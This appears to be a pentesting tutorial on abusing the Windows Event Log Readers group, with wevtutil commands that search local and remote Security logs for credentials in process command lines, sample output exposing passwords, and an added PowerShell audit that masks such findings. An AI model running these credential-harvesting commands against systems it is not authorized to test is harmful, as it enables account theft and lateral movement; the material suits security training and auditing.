Event Log Readers

This group's name is self-explanatory: its members can read the event logs on the local machine.

In many cases, the auditing of process creation events and corresponding command line values is enabled. In that case, this information is saved to the Windows security event log as event ID 4688: A new process has been created.

These logs can sometimes contain credentials.

Using wevtutil to search in security logs

PS C:\hacker> wevtutil qe Security /rd:true /f:text | Select-String "/user"

        Process Command Line:   net use T: \\fs01\backups /user:tim MyStr0ngP@ssword

  • wevtutil qe Security: Queries events in the "Security" log using the wevtutil utility.

  • /rd:true: Reads the events in descending order (most recent first).

  • /f:text: Outputs the events in text format.

  • | Select-String "/user": Pipes (|) the output to Select-String, which filters lines containing the string "/user".

We can also pass it credentials to query the security logs of a remote machine.

wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"

  • /r:share01: Specifies the remote computer share01 to query the event log from.

  • /u:julie.clay: Specifies the username julie.clay to authenticate on the remote machine.

  • /p:Welcome1: Specifies the password Welcome1 for authentication.

Using Get-WinEvent to search in security logs

Get-WinEvent requires administrator access or permissions adjusted on the registry key HKLM\System\CurrentControlSet\Services\Eventlog\Security. Membership in just the Event Log Readers group is not sufficient.

The cmdlet can also be run as another user with the -Credential parameter.
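An added PowerShell example, not from the original page, that turns the search above into an audit: it pulls recent 4688 events with Get-WinEvent, matches the command line against a few heuristic credential patterns such as the /user: and /p: switches shown above, and reports each hit with the secret masked so the exposure can be tracked down without copying the password anywhere else. The function name and the patterns are my own; it assumes command-line logging for 4688 is enabled and that the session has the access Get-WinEvent needs, as noted above.

```powershell
# Added example (not from the original page): find 4688 command lines that
# appear to carry a credential and report them with the secret masked.
# Assumes 4688 command-line logging is on and the caller can read the
# Security log. The patterns below are heuristics, not an exhaustive list.
function Find-CommandLineSecrets {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        [int]$MaxEvents = 5000,
        [pscredential]$Credential              # optional, for a remote host
    )

    # Each pattern names a group 'secret'; only that group is masked.
    $patterns = @(
        '/user:\S+\s+(?<secret>(?!/)\S+)',                # net use ... /user:name <password>
        '/p:(?<secret>\S+)',                              # wevtutil / schtasks style /p:<password>
        '(?:-p|--password|/password)[ =:](?<secret>\S+)', # common CLI switches
        'password=(?<secret>\S+)'                         # key=value style
    )

    $params = @{ ComputerName = $ComputerName
                 FilterHashtable = @{ LogName = 'Security'; Id = 4688 }
                 MaxEvents = $MaxEvents }
    if ($Credential) { $params.Credential = $Credential }

    foreach ($event in Get-WinEvent @params -ErrorAction Stop) {
        # Named EventData fields are easiest to read from the XML rendering.
        $data = ([xml]$event.ToXml()).Event.EventData.Data
        $cmd  = ($data | Where-Object Name -eq 'CommandLine').'#text'
        if ([string]::IsNullOrWhiteSpace($cmd)) { continue }   # logging may be off

        foreach ($pattern in $patterns) {
            $m = [regex]::Match($cmd, $pattern, 'IgnoreCase')
            if (-not $m.Success) { continue }
            [pscustomobject]@{
                TimeCreated = $event.TimeCreated
                Computer    = $event.MachineName
                Subject     = ($data | Where-Object Name -eq 'SubjectUserName').'#text'
                CommandLine = $cmd.Replace($m.Groups['secret'].Value, '********')
            }
            break   # one finding per event is enough
        }
    }
}

# Local run; pass -ComputerName and -Credential to audit another machine.
Find-CommandLineSecrets | Format-Table -AutoSize
```

Each reported line points at a script, scheduled task or habit that should be changed to stop writing secrets into the Security log, and the affected credential should be rotated.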

Note on logs

In the first example above, we query local logs.

When you use AD, you still have local security logs on each domain-joined machine, so this attack still applies because these logs will continue to capture local events.

AD logs on Domain Controllers capture domain-level activities. Both types of logs coexist and provide different layers of insight.